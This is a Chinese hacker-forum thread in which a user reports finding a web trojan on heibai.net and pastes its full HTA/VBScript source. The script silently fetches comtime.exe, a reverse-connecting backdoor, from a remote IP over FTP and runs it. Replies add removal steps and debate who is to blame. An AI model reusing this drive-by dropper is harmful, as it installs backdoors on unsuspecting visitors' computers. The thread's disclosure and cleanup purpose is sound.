论坛: 申请投诉 标题: 【转贴】黑白网络爆出惊人丑闻?20CN被牵涉在内? 复制本贴地址    
作者: allyesno [allyesno]    论坛用户   登录
我说的黑白就是www.heibai.net,今天让我尤其的气愤!
今天我登陆黑白的时候发现在我的任务栏出现了一个最小化的程序,立刻又没有了!因为我前一段时间一直在做网页木马,意识到可能是最新的网页木马,立刻到我的缓存中去查找HTA脚本!果不其然!的确有!
tt[1].hta很显然,他门在网页上安装了最新的网页木马!
这是HTA脚本的源码!
<html>
<HTA:APPLICATION caption="no" border="none" showInTaskBar="yes" windowState="minimize">
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script language="VBScript">
Dim fs, t
Set fs = CreateObject("Scripting.FileSystemObject")
Set t = fs.CreateTextFile("ftp.txt",True)
t.WriteLine("open 218.78.213.248")
t.WriteLine("qwe")
t.WriteLine("qwe")
t.WriteLine("bin")
t.WriteLine("lcd c:\")
t.WriteLine("get comtime.exe")
t.WriteLine("bye")
t.Close
wsh.Run "ftp -s:ftp.txt",0,true
wsh.Run "c:\comtime.exe"
fs.DeleteFile "ftp.txt",true
window.close
</script>
</html>
大家可以很清楚的看到!他连接了218.78.213.248,并下载了comtime.exe这个后门,经过我的测试!这是一个反弹型木马!太狠毒了!太卑鄙了!
在他们的主页源吗中这句
<object data="http://218.78.213.248/hb/hb/tt.wmll"></object>
正是调用木马的语句!!!!!
我真不知道这些人到底想作什么!我们只要一访问他的网页就要中木马!!!
痛骂黑白!・!!!!!
以上所言句句属实,如有半句假话,我以后退出这里!

[此贴被 allyesno(allyesno) 在 09月29日15时20分 编辑过]

地主 发表时间: 09/29 15:33
回复: allyesno [allyesno]   论坛用户   登录
"20CN远程控制1.01客户"
杀进程,
删文件,C:\winnt\system32\comtime.exe
改注册表,HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\comtime


B1层 发表时间: 09/29 15:36
回复: TomyChen [quest]   版主   登录
我去了,怎么没看到一点反映?

B2层 发表时间: 09/29 16:37
回复: disun [benww]   论坛用户   登录
这事我相信不是黑白主使的,因为黑白的服务器是托管,那安全因素很成问题的,一定是有其他人在做手脚。这种人才是最无聊的~~前几年黑白也是被黑过一次,还惊动了孤独剑客,并作了分析。

B3层 发表时间: 09/29 20:01
回复: NetDemon [netdemon]   ADMIN   登录
就算他用的木马是"20CN远程控制1.01客户",也不光我们事啊!怎么能说20CN被牵涉呢?
就像你用刀捅死人,生产刀的厂家是不用付任何责任的阿

B4层 发表时间: 09/30 00:11
回复: hacker521 [hacker521]   论坛用户   登录
说的不错

B5层 发表时间: 09/30 08:25
回复: group [group]   论坛用户   登录
但是如果未经批准擅自生产,就有问题了

B6层 发表时间: 09/30 12:54
回复: hacker521 [hacker521]   论坛用户   登录
那就去告黑白。说他们侵犯了20CN的著作权,呵呵

B7层 发表时间: 09/30 15:47
回复: tommy_he [tommy_he]   版主   登录
安全第一,我好象没有看到!你是不是同时进了什么其他的网站弄的哦!如果这样的话,他的声誉要受打击的!没有那么白痴的人吧!?
还有黑白的连接不是改到A007上面了吗?

B8层 发表时间: 09/30 15:51
回复: disun [benww]   论坛用户   登录
2003-10-02 09:19:13)  星坤
知道了
现在空间都是四处要的,都不知道多少人在用这个服务器,出现这种事情,难免得
也不想解释什么了,让他们自生自灭吧


以上为星坤的解释~~

B9层 发表时间: 10/02 22:12
回复: tommy_he [tommy_he]   版主   登录
真的假的!这么解释等于不解释!

B10层 发表时间: 10/03 00:14
回复: keke [keke1]   论坛用户   登录
怎么也要叫黑白解释一下呀...

B11层 发表时间: 10/05 11:40

论坛: 申请投诉

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号